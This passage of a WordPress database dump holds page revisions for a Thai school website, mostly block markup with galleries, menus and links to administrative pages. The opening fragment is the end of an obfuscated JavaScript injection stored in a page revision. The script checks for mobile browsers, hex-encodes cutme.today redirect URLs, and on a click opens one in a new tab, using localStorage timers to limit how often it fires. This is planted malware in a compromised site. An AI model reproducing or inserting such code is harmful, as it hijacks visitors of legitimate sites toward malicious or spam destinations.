)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-09-11 14:28:54','2025-09-11 07:28:54','',14,'http://pakhaeng.ssk.in.th/?p=2034',0,'revision','',0),
(2036,1,'2025-09-11 14:31:24','2025-09-11 07:31:24','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"9f7ee323\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1e35ff-0d\",\"ids\":[2026],\"type\":\"carousel\",\"imagesDynamic\":[{\"id\":2026,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=2026\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-1024x410.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner.png\",\"width\":1024,\"height\":410}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1754\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button 